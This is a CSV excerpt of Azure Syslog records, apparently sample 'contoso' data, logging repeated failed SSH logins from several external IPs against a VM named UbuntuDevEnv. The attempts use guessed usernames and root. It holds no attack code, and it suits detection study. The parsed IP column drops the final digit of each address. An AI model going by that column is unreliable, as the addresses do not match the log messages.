+7159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:35,UbuntuDevEnv,2019-06-26 17:22:34,auth,UbuntuDevEnv,info,Invalid user database2 from 171.8.199.77 port 53460,48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,database2,171.8.199.7,53460,,
+7160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:35,UbuntuDevEnv,2019-06-26 17:22:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:35,UbuntuDevEnv,2019-06-26 17:22:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+7162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:36,UbuntuDevEnv,2019-06-26 17:22:35,auth,UbuntuDevEnv,info,Failed password for invalid user database2 from 171.8.199.77 port 53460 ssh2,48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,database2,171.8.199.7,53460,,
+7163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:40,UbuntuDevEnv,2019-06-26 17:22:39,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 53460:11: Bye Bye [preauth],48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,53460,,
+7164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:40,UbuntuDevEnv,2019-06-26 17:22:39,auth,UbuntuDevEnv,info,Disconnected from invalid user database2 171.8.199.77 port 53460 [preauth],48977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,database2,171.8.199.7,53460,,
+7165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:43,UbuntuDevEnv,2019-06-26 17:22:42,auth,UbuntuDevEnv,info,Invalid user mdom from 111.230.29.17 port 59928,49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdom,111.230.29.1,59928,,
+7166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:43,UbuntuDevEnv,2019-06-26 17:22:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:43,UbuntuDevEnv,2019-06-26 17:22:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:45,UbuntuDevEnv,2019-06-26 17:22:44,auth,UbuntuDevEnv,info,Failed password for invalid user mdom from 111.230.29.17 port 59928 ssh2,49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdom,111.230.29.1,59928,,
+7169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:45,UbuntuDevEnv,2019-06-26 17:22:44,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 59928:11: Bye Bye [preauth],49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,59928,,
+7170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:45,UbuntuDevEnv,2019-06-26 17:22:44,auth,UbuntuDevEnv,info,Disconnected from invalid user mdom 111.230.29.17 port 59928 [preauth],49009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdom,111.230.29.1,59928,,
+7171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:46,UbuntuDevEnv,2019-06-26 17:22:46,auth,UbuntuDevEnv,info,Invalid user porteus from 77.237.69.165 port 54470,49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,77.237.69.1,54470,,
+7172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:46,UbuntuDevEnv,2019-06-26 17:22:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:46,UbuntuDevEnv,2019-06-26 17:22:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:48,UbuntuDevEnv,2019-06-26 17:22:47,auth,UbuntuDevEnv,info,Failed password for invalid user porteus from 77.237.69.165 port 54470 ssh2,49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,77.237.69.1,54470,,
+7175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:48,UbuntuDevEnv,2019-06-26 17:22:47,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 54470:11: Bye Bye [preauth],49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,54470,,
+7176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:48,UbuntuDevEnv,2019-06-26 17:22:47,auth,UbuntuDevEnv,info,Disconnected from invalid user porteus 77.237.69.165 port 54470 [preauth],49022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,77.237.69.1,54470,,
+7177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:34,UbuntuDevEnv,2019-06-26 17:23:34,auth,UbuntuDevEnv,info,Invalid user stationeers from 74.94.246.82 port 50350,49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stationeers,74.94.246.8,50350,,
+7178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:34,UbuntuDevEnv,2019-06-26 17:23:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:34,UbuntuDevEnv,2019-06-26 17:23:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:36,UbuntuDevEnv,2019-06-26 17:23:35,auth,UbuntuDevEnv,info,Failed password for invalid user stationeers from 74.94.246.82 port 50350 ssh2,49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stationeers,74.94.246.8,50350,,
+7181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:36,UbuntuDevEnv,2019-06-26 17:23:35,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 50350:11: Bye Bye [preauth],49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,50350,,
+7182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:23:36,UbuntuDevEnv,2019-06-26 17:23:35,auth,UbuntuDevEnv,info,Disconnected from invalid user stationeers 74.94.246.82 port 50350 [preauth],49193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stationeers,74.94.246.8,50350,,
+7183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:15,UbuntuDevEnv,2019-06-26 17:24:14,auth,UbuntuDevEnv,info,Invalid user socrate from 77.237.69.165 port 33424,49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,77.237.69.1,33424,,
+7184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:15,UbuntuDevEnv,2019-06-26 17:24:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:15,UbuntuDevEnv,2019-06-26 17:24:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:16,UbuntuDevEnv,2019-06-26 17:24:15,auth,UbuntuDevEnv,info,Invalid user clamav1 from 111.230.29.17 port 45072,49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav1,111.230.29.1,45072,,
+7187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:16,UbuntuDevEnv,2019-06-26 17:24:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:16,UbuntuDevEnv,2019-06-26 17:24:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:17,UbuntuDevEnv,2019-06-26 17:24:16,auth,UbuntuDevEnv,info,Failed password for invalid user socrate from 77.237.69.165 port 33424 ssh2,49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,77.237.69.1,33424,,
+7190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:17,UbuntuDevEnv,2019-06-26 17:24:16,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 33424:11: Bye Bye [preauth],49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,33424,,
+7191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:17,UbuntuDevEnv,2019-06-26 17:24:16,auth,UbuntuDevEnv,info,Disconnected from invalid user socrate 77.237.69.165 port 33424 [preauth],49334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,77.237.69.1,33424,,
+7192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:18,UbuntuDevEnv,2019-06-26 17:24:17,auth,UbuntuDevEnv,info,Failed password for invalid user clamav1 from 111.230.29.17 port 45072 ssh2,49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav1,111.230.29.1,45072,,
+7193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:18,UbuntuDevEnv,2019-06-26 17:24:18,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 45072:11: Bye Bye [preauth],49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,45072,,
+7194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:18,UbuntuDevEnv,2019-06-26 17:24:18,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav1 111.230.29.17 port 45072 [preauth],49337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav1,111.230.29.1,45072,,
+7195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:38,UbuntuDevEnv,2019-06-26 17:24:38,auth,UbuntuDevEnv,info,Invalid user clamav from 27.50.24.83 port 57619,49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,27.50.24.8,57619,,
+7196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:38,UbuntuDevEnv,2019-06-26 17:24:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.50.24.83,49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.50.24.8,,0,
+7197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:38,UbuntuDevEnv,2019-06-26 17:24:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:40,UbuntuDevEnv,2019-06-26 17:24:40,auth,UbuntuDevEnv,info,Failed password for invalid user clamav from 27.50.24.83 port 57619 ssh2,49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,27.50.24.8,57619,,
+7199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:41,UbuntuDevEnv,2019-06-26 17:24:40,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav 27.50.24.83 port 57619 [preauth],49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,27.50.24.8,57619,,
+7200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:41,UbuntuDevEnv,2019-06-26 17:24:40,auth,UbuntuDevEnv,info,"Received disconnect from 27.50.24.83 port 57619:11: Normal Shutdown, Thank you for playing [preauth]",49418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.50.24.8,57619,,
+7201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:41,UbuntuDevEnv,2019-06-26 17:24:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77  user=root,49422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,171.8.199.7,,0,
+7202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:42,UbuntuDevEnv,2019-06-26 17:24:42,auth,UbuntuDevEnv,info,Failed password for root from 171.8.199.77 port 39910 ssh2,49422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,39910,,
+7203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:42,UbuntuDevEnv,2019-06-26 17:24:42,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 39910:11: Bye Bye [preauth],49422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,39910,,
+7204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:24:42,UbuntuDevEnv,2019-06-26 17:24:42,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 171.8.199.77 port 39910 [preauth],49422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,171.8.199.7,39910,,
+7205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:05,UbuntuDevEnv,2019-06-26 17:25:05,auth,UbuntuDevEnv,info,Invalid user vweru from 74.94.246.82 port 39304,49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,74.94.246.8,39304,,
+7206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:05,UbuntuDevEnv,2019-06-26 17:25:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:05,UbuntuDevEnv,2019-06-26 17:25:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:07,UbuntuDevEnv,2019-06-26 17:25:07,auth,UbuntuDevEnv,info,Failed password for invalid user vweru from 74.94.246.82 port 39304 ssh2,49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,74.94.246.8,39304,,
+7209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:08,UbuntuDevEnv,2019-06-26 17:25:07,auth,UbuntuDevEnv,info,Disconnected from invalid user vweru 74.94.246.82 port 39304 [preauth],49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,74.94.246.8,39304,,
+7210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:08,UbuntuDevEnv,2019-06-26 17:25:07,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 39304:11: Bye Bye [preauth],49522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,39304,,
+7211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:43,UbuntuDevEnv,2019-06-26 17:25:42,auth,UbuntuDevEnv,info,Invalid user user01 from 77.237.69.165 port 40611,49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,77.237.69.1,40611,,
+7212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:43,UbuntuDevEnv,2019-06-26 17:25:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:43,UbuntuDevEnv,2019-06-26 17:25:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:45,UbuntuDevEnv,2019-06-26 17:25:44,auth,UbuntuDevEnv,info,Failed password for invalid user user01 from 77.237.69.165 port 40611 ssh2,49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,77.237.69.1,40611,,
+7215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:45,UbuntuDevEnv,2019-06-26 17:25:45,auth,UbuntuDevEnv,info,Disconnected from invalid user user01 77.237.69.165 port 40611 [preauth],49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,77.237.69.1,40611,,
+7216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:45,UbuntuDevEnv,2019-06-26 17:25:45,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 40611:11: Bye Bye [preauth],49657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,40611,,
+7217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:48,UbuntuDevEnv,2019-06-26 17:25:47,auth,UbuntuDevEnv,info,Invalid user nevada from 111.230.29.17 port 58450,49669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nevada,111.230.29.1,58450,,
+7218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:25:48,UbuntuDevEnv,2019-06-26 17:25:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,49669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
